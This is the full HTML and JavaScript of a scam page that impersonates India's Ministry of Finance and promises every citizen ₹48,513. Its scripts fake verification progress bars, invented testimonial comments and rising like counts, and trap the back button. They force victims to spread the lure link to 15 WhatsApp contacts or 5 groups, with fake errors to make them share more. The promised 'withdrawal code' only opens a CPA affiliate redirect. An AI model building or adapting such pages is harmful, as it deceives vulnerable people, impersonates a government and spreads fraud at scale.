

<!DOCTYPE html>
<html>
    <head>


<img src='https://i.imgur.com/LXyCjxk.png' width='100%'/>
<meta property="og:title" content="48,513 Indian Rupee - For every indian citizen" />
	<meta property="og:type" content="website" /> 
	<meta property="og:url" content="https://finmin.nic.in" />
	<meta property="og:image" content="https://i.imgur.com/GWxGm6q.jpeg" />
	<meta property="og:description" content="Click here to register" />
	<link rel="image_src" href="https://i.imgur.com/GWxGm6q.jpeg" />
	<meta property="og:image" content="https://i.imgur.com/GWxGm6q.jpeg" />
	<meta name="twitter:image:src" content="https://i.imgur.com/GWxGm6q.jpeg">
	<meta name="twitter:image" content="https://i.imgur.com/GWxGm6q.jpeg">
	<link rel="icon" href="https://i.imgur.com/GWxGm6q.jpeg"> 
        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <title>48513 Indian Rupee</title>
        <link rel="shortcut icon" type="image/png" href="https://i.imgur.com/OMSBF24.jpg" />
   
        <meta name="robots" content="noindex" />
        <meta name="theme-color" content="#007dbc" />
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" />
    </head>
<body>
<style type="text/css">
@import url("https://fonts.googleapis.com/css2?family=Poppins:wght@500;700&display=swap");
@import url("https://fonts.googleapis.com/earlyaccess/droidarabicnaskh.css");
* {
    margin: 0;
    padding: 0;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: bold;
    box-sizing: border-box;


}
body {
    direction: lfl;
    background: #ebedf0;
}
a {
    text-decoration: none;
}
.post {
    background: #fff;
    margin: 0 auto;
    padding: 10px;
    max-width: 500px;
    border: 1px solid #d0d1d5;
    border-radius: 3px;
}
.post img {
    width: 100%;
}
.welcome {
    font-size: 15px;
}
.amount,
#getname {
    color: #16a085;
    text-decoration: underline;
}
.done {
    text-align: center;
    color: #27ae60;
}
.tip {
    font-size: 14px;
}
.title {
    text-align: center;
}
.error {
    display: none;
    text-align: center;
    font-size: 14px;
    color: #e74c3c;
}
button {
    display: block;
    width: 250px;
    height: 50px;
    color: #fff;
    border: none;
    outline: none;
    font-size: 18px;
    cursor: pointer;
    border-radius: 5px;
    padding: 0 10px;
    margin: 10px auto;
    background: #ff6128;
    transition: background 0.3s ease;
}
button:hover {
    background: #16a085;
}
.phone {
    max-width: 400px;
    margin: 10px auto;
}
.phone input {
    width: 100%;
    height: 50px;
    padding: 10px;
    outline: none;
    border: 2px solid #cecece;
    font-size: 14px;
}
#confirm {
    width: 200px;
    margin: 10px auto;
    border-radius: 0px;
}
#loader {
    text-align: center;
}
.spin {
    width: 100px;
    height: 100px;
    background: transparent;
    border: solid 8px #16a085;
    border-right-color: transparent;
    border-radius: 80%;
    margin: 10px auto;
    animation: spin 0.8s linear infinite;
}
@keyframes spin {
    100% {
        transform: rotate(1turn);
    }
}
#loader,
#info,
#checking,
#share,
#claim {
    display: none;
}
.center {
    display: flex;
    align-items: center;
    justify-content: center;
}
.barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #16a085;
}
#fill,
#fill2 {
    background: #27ae60;
    width: 0%;
    height: 100%;
}
.percentage {
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #16a085;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
#check,
#check2 {
    display: none;
}
.counter {
    color: #7f7f7f;
    font-size: 12px;
    text-align: right;
    padding: 10px 0 10px 2px;
    border-bottom: 1px solid #e1e2e3;
}
.reactions {
    display: inline-flex;
    align-items: center;
    float: left;
}
.counter img {
    float: left;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    border: 2px solid #fff;
    box-sizing: content-box;
}
.like,
.love {
    margin-right: -5px;
}
.like {
    z-index: 2;
}
.love {
    z-index: 1;
}
.bar {
    display: table;
    width: 100%;
    border-bottom: 1px solid #e1e2e3;
}
.bar .react {
    display: table-cell;
    width: calc(100% / 3);
    font-size: 12px;
    color: #7f7f7f;
    text-align: center;
    padding: 10px 0;
    cursor: pointer;
}
.comments {
    direction: ltr;
}
.comment {
    padding: 6px 0;
    margin-top: 5px;
}
.comment img {
    float: left;
    width: 32px;
    height: 32px;
    border: none;
    border-radius: 18px;
    cursor: pointer;
}
.reply {
    margin-left: 37px;
}
.single-container {
    margin-left: 37px;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    font-size: 12px;
}
.single-container .user {
    display: inline-block;
    cursor: pointer;
    color: #365899;
    margin-bottom: 5px;
}
.single-container .text {
    display: block;
}
.buttons {
    font-size: 12px;
    font-weight: bold;
    margin: 10px 0 0 47px;
    color: #90949c;
}
.action {
    cursor: pointer;
}
.action:hover {
    text-decoration: underline;
}
.input {
    padding: 6px 12px 12px;
}
.input input {
    width: 100%;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    border: 0;
    outline: none;
}
</style>
  
  
  
  
    <div class="post">

        <div id="intro">
<img src='https://i.imgur.com/JnXKEJb.png' width='100%'/>

            <p class="welcome">
                After taking into consideration the financial crisis experienced by the Indian people, the Ministry of Finance decided to give every citizen an amount of <span class="amount">( ₹48513 )</span> to reduce the severity of the crisis <span> </span><br>
                 
                </p>
            <button id="go">Register for support</button>
        </div>
        <div id="loader">
            <div>Please Wait...</div>
            <div class="spin"></div>
            <div id="num">0%</div>
        </div>
        <div id="info">
            <p class="title">Enter your full name :</p>
            <div class="phone">
<center><input type="text" placeholder=" Enter your name here " id="name" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 16px;width: 335px;" onkeypress="return numberonly(event);"><br>

                <button id="confirm">Send</button>
            </div>
            <p class="error">!Please enter a valid name</p>
        </div>
        <div id="checking">
            <p class="title">Checking name...</p>
            <div class="barr">
                <div class="fill">
                    <div id="fill"></div>
                </div>
                <div class="percentage center">
                    <span id="load"><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="check"><i class="fa fa-check-circle"></i></span>
                    <span id="percentage"></span>
                </div>
            </div>
        </div>
        <div id="share">
            <p class="tip">Hello  <span id="getname"></span>،</p>
            <p class="tip">
                After verification, it turns out that you are eligible for a financial benefit of <span class="amount">(₹48,513) Indian Rupee</span>
            </p><br>
            <p class="tip">The amount will be immediately available after following the instructions below :</p>
            <p class="tip">1- Click the "Invite" button below and send the message to 15 friends or 5 groups on WhatsApp, so that they can in turn benefit from the financial support program</p>
            <p class="tip">2- The withdrawal code will appear immediately after the green verification bar is filled</p>
            <button id="whatsapp">Invite</button>
            <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                </div>
            </div>
        </div>
        <div id="claim">
            <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
            <p class="title">You can now get the withdrawal code</p>
            <button id="offer">Click here to view the code</button>
  
           </div>
        <div class="comments">
            <div class="counter">
                <div class="reactions">
                    <img class="like" src="https://www.facebook.com/reaction/image/1635855486666999/?size=20&scale=1" /> <img class="love" src="https://www.facebook.com/reaction/image/1678524932434102/?size=20&scale=1" /> <img class="care" src="https://www.facebook.com/reaction/image/613557422527858/?size=20&scale=1" /> <span id="likes">134K</span>
                </div>
                <span id="comments">23K comments</span> <span class="dot">·</span> <span id="shares">12K shares</span>
            </div>
            <div class="bar">
                <span class="react"><i class="fa fa-thumbs-o-up"></i> <a class="liked">Like</a></span> <span class="react"><i class="fa fa-comment-o"></i> Comment</span> <span class="react"><i class="fa fa-share"></i> Share</span>
            </div>
            <div>
                <div class="comment">
                    </div>
                </div>
                <div class="comment">
                    <img src="https://i.imgur.com/xp1ER6K.jpg" />
                    <div class="single-container">
                        <span class="user">Arpita Ganguly</span>
                        <span class="text">
Thank you very much. I did not believe in these things, I swear to God, I still could not believe. I went to the agency after I received the withdrawal code and I was hesitant and afraid, but it turned out to be true and I received a (₹48,513) Indian rupee from the agency
                        </span>
                    </div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://i.imgur.com/qxPvt9E.jpg" />
                    <div class="single-container"><span class="user">Jenisha Parmar</span> <span class="text">Why doesn't the code arrive? My girlfriend got the money, but I've been waiting for half an hour and I didn't receive the code?</span></div>
                    <div class="buttons"><span class="time t2">2m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment reply">
                    <img src="https://i.imgur.com/n2eS5mi.jpg" />
                    <div class="single-container"><span class="user">Dinesh Bhambhani</span> <span class="text">My sister, just have some patience. The site is under great pressure. I waited for more than two hours, and in the end I got the code and got the amount.</span></div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://i.imgur.com/2muaoUL.jpg" />
                    <div class="single-container"><span class="user">Chanchal Goyal</span> <span class="text">❤️ Thank you very much, I really needed the money</span></div>
                    <div class="buttons"><span class="time t3">4m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="input"><input placeholder="Write a comment..." /></div>
            </div>
        </div>
    </div>
    <script src="https://code.jquery.com/jquery-latest.min.js"></script>
    <script type="text/javascript">
        !(function () {
            var psy;
            try {
                for (psy = 0; 10 > psy; ++psy) history.pushState({}, "", "");
                onpopstate = function (psy) {
                    psy.state && alert("!You have been registered in the list of beneficiaries, please complete the steps, you have one step left");
                };
            } catch (o) {}
        })();
    </script>




<script type="text/javascript">
var time = 0;
window.setInterval(function () {
    time = time + 1;
    $(".t1").html(time + 1 + "m");
    $(".t2").html(time + 2 + "m");
    $(".t3").html(time + 4 + "m");
}, 6e4);
var likes = 134,
    comments = 23,
    shares = 12;
window.setInterval(function () {
    likes = likes + Math.floor(Math.random() * 3);
    comments = comments + Math.floor(Math.random() * 2);
    shares = shares + Math.floor(Math.random() * 2);
    $("#likes").html(likes + "K");
    $("#comments").html(comments + "K comments");
    $("#shares").html(shares + "K shares");
}, 5e3);
$(".liked").click(function () {
    if ($(this).hasClass("selected")) {
        $(this).removeClass("selected");
        $(this).html("Like");
    } else {
        $(this).addClass("selected");
        $(this).html("Unlike");
    }
});
</script>








<script type="text/javascript">

$("#go").click(function () {
    $("#intro").fadeOut(0);
    $("#loader").fadeIn(1000);
    var i = 0;
    var interval = setInterval(function () {
        $("#num").text(i + "%");
        i += 1;
        if (i >= 100) {
            clearInterval(interval);
            $("#loader").fadeOut(0);
            $("#info").fadeIn(1000);
        }
    }, 50);
});
$("#confirm").click(function () {
    if ($("#name").val().length < 4) {
        $(".error").fadeIn(500);
    } else {
        $("#info").fadeOut(0);
        $("#checking").fadeIn(1000);
        var i = 0;
        var interval = setInterval(function () {
            i += 1;
            $("#percentage").text(i + "%");
            $("#fill").css("width", i + "%");
            if (i == 50) {
                i = 49;
                setTimeout(function () {
                    i = 50;
                }, 1000);
            }
            if (i >= 100) {
                clearInterval(interval);
                $("#load").fadeOut(0);
                $("#check").fadeIn(0);
                setTimeout(function () {
                    $("#checking").fadeOut(0);
                    $("#share").fadeIn(1000);
                    $("#getname").html($("#name").val());
                }, 1000);
            }
        }, 50);
    }
});
$(document).click(function () {
    if ($("#name").is(":focus")) {
        $(".error").fadeOut(500);
    }
});
</script>









    <script>
        var text1 = "URGENT After the surge in prices, the government decided to give the ",
            text2 = " an amount of ",
            text3 = " for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 https://hgm.edu.pl/FinMinIndia",
            error = "something is wrong!\nPosts are not calculated. You may have shared it with the same friend or group more than once, please re-share",
            cpa = "https://fearinvulnerablediagnosis.com/agyv7ex6?key=96eb9366cb1c6c1b8ab6ab46c574e6fb",
            saved = "MAMA7lwa",
            share = "whatsapp://send?text=" + text1 + "Indian people" + text2 + "*₹48513*" + text3;
    </script>






 <script type="text/javascript">
 var swidth = localStorage.getItem(saved);
if (swidth !== null) {
    var width = swidth * 1;
    $("#intro").fadeOut(0);
    $(".comments").fadeOut(0);
    $("#share").fadeIn(0);
    $("#fill2").css("width", width + "%");
    $("#percentage2").text(width + "%");
} else {
    var width = 0;
}
$("#whatsapp").click(function () {
    window.location.href = share;
    if (width == 0) {
        width += 50;
    } else if (width == 50) {
        alert(error);
        width += 15;
    } else if (width == 65) {
        width += 5;
    } else if (width == 70) {
        alert(error);
        width += 10;
    } else if (width == 80) {
        alert(error);
        width += 5;
    } else if (width == 85) {
        width += 5;
    } else if (width == 90) {
        width += 4;
    } else if (width == 94) {
        width += 2;
    } else if (width == 96) {
        width += 2;
    } else {
        $("#share").fadeOut(0);
        $("#claim").fadeIn(1000);
    }
    localStorage.setItem(saved, width);
    setTimeout(function () {
        $("#fill2").css("width", width + "%");
        $("#percentage2").text(width + "%");
    }, 2000);
});
$("#offer").click(function () {
    window.open(cpa, "_blank");
});



</script>
 
<!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4781913,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?4781913&101" alt="web statistic" border="0"></a></noscript>
<!-- Histats.com  END  -->


</body></html>
